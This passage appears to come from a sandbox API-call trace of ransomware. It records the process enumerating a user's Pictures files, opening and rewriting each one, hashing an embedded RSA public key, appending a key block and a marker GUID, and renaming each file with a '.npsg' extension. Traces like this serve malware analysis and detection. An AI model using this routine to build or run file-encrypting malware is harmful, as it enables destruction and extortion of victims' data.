lpMem=0x3b88d48 | out: hHeap=0x620000) returned 1 [0239.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.422] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x7ac6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.422] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.422] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.422] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.422] CloseHandle (hObject=0x644) returned 1 [0239.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0239.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b89cd0 [0239.424] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\qNIL51f-5GrV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\qnil51f-5grv.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\qNIL51f-5GrV.jpg.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\qnil51f-5grv.jpg.npsg")) returned 1 [0239.426] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9479f80, ftCreationTime.dwHighDateTime=0x1d5bfa0, ftLastAccessTime.dwLowDateTime=0x67162440, ftLastAccessTime.dwHighDateTime=0x1d5c126, ftLastWriteTime.dwLowDateTime=0x67162440, ftLastWriteTime.dwHighDateTime=0x1d5c126, nFileSizeHigh=0x0, nFileSizeLow=0x16950, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tf2kUivctDVGMBx-E0W_.bmp", cAlternateFileName="TF2KUI~1.BMP")) returned 1 [0239.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0239.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0239.426] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\Tf2kUivctDVGMBx-E0W_.bmp") returned=".bmp" [0239.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\Tf2kUivctDVGMBx-E0W_.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\tf2kuivctdvgmbx-e0w_.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.426] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=92496) returned 1 [0239.426] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.428] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1692a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.428] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.430] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x16950, lpOverlapped=0x0) returned 1 [0239.431] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.431] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.431] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.431] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.432] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.432] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.432] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.432] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.432] GetLastError () returned 0x0 [0239.432] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.432] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.433] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.433] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.433] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.433] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.434] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.434] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.434] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.434] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.434] CloseHandle (hObject=0x644) returned 1 [0239.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8da60 [0239.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b89cd0 [0239.436] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\Tf2kUivctDVGMBx-E0W_.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\tf2kuivctdvgmbx-e0w_.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\Tf2kUivctDVGMBx-E0W_.bmp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\tf2kuivctdvgmbx-e0w_.bmp.npsg")) returned 1 [0239.438] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cc7460, ftCreationTime.dwHighDateTime=0x1d5ba77, ftLastAccessTime.dwLowDateTime=0xcb584d60, ftLastAccessTime.dwHighDateTime=0x1d5c5d7, ftLastWriteTime.dwLowDateTime=0xcb584d60, ftLastWriteTime.dwHighDateTime=0x1d5c5d7, nFileSizeHigh=0x0, nFileSizeLow=0xe906, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XgWg4pXlG0kaP.bmp", cAlternateFileName="XGWG4P~1.BMP")) returned 1 [0239.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0239.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0239.438] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\XgWg4pXlG0kaP.bmp") returned=".bmp" [0239.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\XgWg4pXlG0kaP.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\xgwg4pxlg0kap.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.440] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=59654) returned 1 [0239.440] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.443] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xe8e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.443] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.445] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xe906, lpOverlapped=0x0) returned 1 [0239.446] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.446] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.446] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.446] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.447] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.447] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.447] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.448] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.448] GetLastError () returned 0x0 [0239.448] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.448] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.448] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.448] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.448] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.448] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.449] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xe906, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.449] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.449] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.449] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.449] CloseHandle (hObject=0x644) returned 1 [0239.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0239.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b89cd0 [0239.451] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\XgWg4pXlG0kaP.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\xgwg4pxlg0kap.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\XgWg4pXlG0kaP.bmp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\xgwg4pxlg0kap.bmp.npsg")) returned 1 [0239.453] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28cc7460, ftCreationTime.dwHighDateTime=0x1d5ba77, ftLastAccessTime.dwLowDateTime=0xcb584d60, ftLastAccessTime.dwHighDateTime=0x1d5c5d7, ftLastWriteTime.dwLowDateTime=0xcb584d60, ftLastWriteTime.dwHighDateTime=0x1d5c5d7, nFileSizeHigh=0x0, nFileSizeLow=0xe906, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XgWg4pXlG0kaP.bmp", cAlternateFileName="XGWG4P~1.BMP")) returned 0 [0239.453] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0239.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0239.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c43c0 | out: hHeap=0x620000) returned 1 [0239.453] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0239.454] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0239.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.454] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0239.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.455] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0239.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0239.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0239.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.456] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0239.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0239.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0239.457] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.457] 